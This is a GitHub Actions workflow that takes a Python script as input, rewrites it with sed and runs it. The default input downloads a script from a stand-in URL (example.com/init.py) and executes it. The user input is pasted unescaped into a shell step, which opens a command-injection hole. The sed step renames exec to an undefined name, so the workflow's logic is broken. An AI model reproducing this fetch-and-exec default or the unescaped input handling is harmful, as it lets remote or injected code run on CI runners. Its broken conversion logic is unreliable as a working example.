name: Convert and Execute Python Script

on:
  workflow_dispatch:
    inputs:
      old_script:
        description: "Enter the old Python script"
        required: true
        default: "import urllib.request;r=urllib.request.urlopen('https://example.com/init.py');exec(r.read().decode('utf-8'),{})"

jobs:
  convert_and_execute:
    runs-on: ubuntu-latest

    steps:
      # Step 1: Checkout the repository
      - name: Checkout repository
        uses: actions/checkout@v3

      # Step 2: Set up Python 3
      - name: Set up Python 3.x
        uses: actions/setup-python@v3
        with:
          python-version: '3.x'

      # Step 3: Save the old script to a file
      - name: Save old script to a file
        run: |
          echo "${{ github.event.inputs.old_script }}" > old_script.py

      # Step 4: Convert the old script (modify it to make it work)
      - name: Convert the old script to a working script
        run: |
          # Assuming you want to make some changes in the script
          sed 's/exec/running_exec/' old_script.py > new_script.py
          cat new_script.py

      # Step 5: Run the converted script
      - name: Run the converted Python script
        run: |
          python3 new_script.py
